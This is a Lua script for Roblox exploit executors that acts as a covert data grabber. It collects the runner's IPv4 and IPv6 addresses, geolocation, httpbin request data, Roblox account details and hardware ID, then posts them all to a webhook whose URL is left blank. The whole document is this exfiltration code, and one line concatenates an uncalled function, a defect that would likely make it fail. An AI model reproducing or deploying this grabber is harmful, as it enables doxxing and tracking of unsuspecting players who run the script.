Webhook = "" SomeoneExecuted = "" function ExecuteWebhook() --[] IP Variables local IPv4 = game:HttpGet("https://api.ipify.org") local IPv6 = game:HttpGet("https://api64.ipify.org") local HTTPbin = game:HttpGet("https://httpbin.org/get") local GeoPlug = game:HttpGet("http://www.geoplugin.net/json.gp?ip=" .. IPv4) --[] Roblox Account Variables local LocalPlayer = game:GetService("Players").LocalPlayer local AccountAge = LocalPlayer.AccountAge local MembershipType = string.sub(tostring(LocalPlayer.MembershipType), 21) local UserId = LocalPlayer.UserId local PlayerName = LocalPlayer.Name local DisplayName = LocalPlayer.DisplayName local PlaceID = game.PlaceId local plr = game.Players.LocalPlayer local LogTime = os.date("!%Y-%m-%d-%H:%M:%S GMT+0") local rver = "Version 1.0B" local HWID = game:GetService("RbxAnalyticsService"):GetClientId() --[] IdentifyExploit Function function identifyexploit() local ieSuccess, ieResult = pcall(identifyexecutor) if ieSuccess then return ieResult end return (SENTINEL_LOADED and "Sentinel") or (XPROTECT and "SirHurt") or (PROTOSMASHER_LOADED and "Protosmasher") end --[] Executor Level local function try(fn, ...) return (pcall(fn, ...)) end function executorlvl() local securityChecks = { { name = "None", number = 0, canAccess = try( function() return game.Name end ) }, { name = "PluginSecurity", number = 1, canAccess = try( function() return game:GetService("CoreGui").Name end ) }, { name = "LocalUserSecurity", number = 3, canAccess = try( function() return game.DataCost end ) }, { name = "WritePlayerSecurity", number = 4, canAccess = try(Instance.new, "Player") }, { name = "RobloxScriptSecurity", number = 5, canAccess = try( function() return game:GetService("CorePackages").Name end ) }, { name = "RobloxSecurity", number = 6, canAccess = try( function() return Instance.new("SurfaceAppearance").TexturePack end ) }, { name = "NotAccessibleSecurity", number = 7, canAccess = try( function() Instance.new("MeshPart").MeshId = "" end ) } } local lasti = 1 for i = 1, #securityChecks do if securityChecks[i].canAccess then lasti = i else return lasti end end return lasti end currentidentity = tostring(executorlvl()) --[] Webhook Variables local Headers = {["content-type"] = "application/json"} --[[ Webhook ]] local PlayerData = { ["content"] = "", ["embeds"] = { { ["author"] = { ["name"] = "Someone Executed " .. SomeoneExecuted }, ["title"] = PlayerName, ["description"] = ": " .. DisplayName, ["fields"] = { { --[[ Username / PlayerName ]] -- ["name"] = "__Username:__", ["value"] = PlayerName, ["inline"] = true }, { --[[ User ]] -- ["name"] = "__User:__", ["value"] = "https://www.roblox.com/users/" .. plr.UserId, ["inline"] = true }, { --[[ UserID ]] -- ["name"] = "__UserId:__", ["value"] = UserId, ["inline"] = true }, { --[[ Membership type ]] -- ["name"] = "__Membership Type:__", ["value"] = MembershipType, ["inline"] = true }, { --[[ Account age ]] -- ["name"] = "__Account Age (days):__", ["value"] = AccountAge, ["inline"] = true }, { --[[ Place ID ]] -- ["name"] = "__Place ID:__ ", ["value"] = PlaceID, ["inline"] = true }, { --[[ Game Link ]] -- ["name"] = "__Game Link:__ ", ["value"] = "https://www.roblox.com/games/" .. PlaceID, ["inline"] = true }, { --[[ HWID ]] -- ["name"] = "__HWID:__ ", ["value"] = HWID, ["inline"] = true }, { --[[ Exploit / Executor ]] -- ["name"] = "__Executor:__ ", ["value"] = identifyexploit(), ["inline"] = true }, { --[[ Exploit / Executor LVL]] -- ["name"] = "__Executor LVL:__ ", ["value"] = "LVL : " .. executorlvl, ["inline"] = true }, { --[[ IPv4 ]] -- ["name"] = "__IPv4:__", ["value"] = IPv4, ["inline"] = true }, { --[[ IPv6 ]] -- ["name"] = "__IPv6:__", ["value"] = IPv6, ["inline"] = true }, { --[[ Log / Grab time ]] -- ["name"] = "__Log Time:__", ["value"] = LogTime, ["inline"] = true }, { --[[ HTTPbin ]] -- ["name"] = "__HTTPbin Data__ (JSON):", ["value"] = "```json" .. "\n" .. HTTPbin .. "```", ["inline"] = false }, { --[[ geoPlugin ]] -- ["name"] = "__geoPlugin Data__ (JSON):", ["value"] = "```json" .. "\n" .. GeoPlug .. "```", ["inline"] = false } } } } } --[] Variables local PlayerData = game:GetService("HttpService"):JSONEncode(PlayerData) HttpRequest = (syn and syn.request) or (http and http.request) or http_request or (fluxus and fluxus.request) or request --[] HttpRequest HttpRequest({Url = Webhook, Body = PlayerData, Method = "POST", Headers = Headers}) end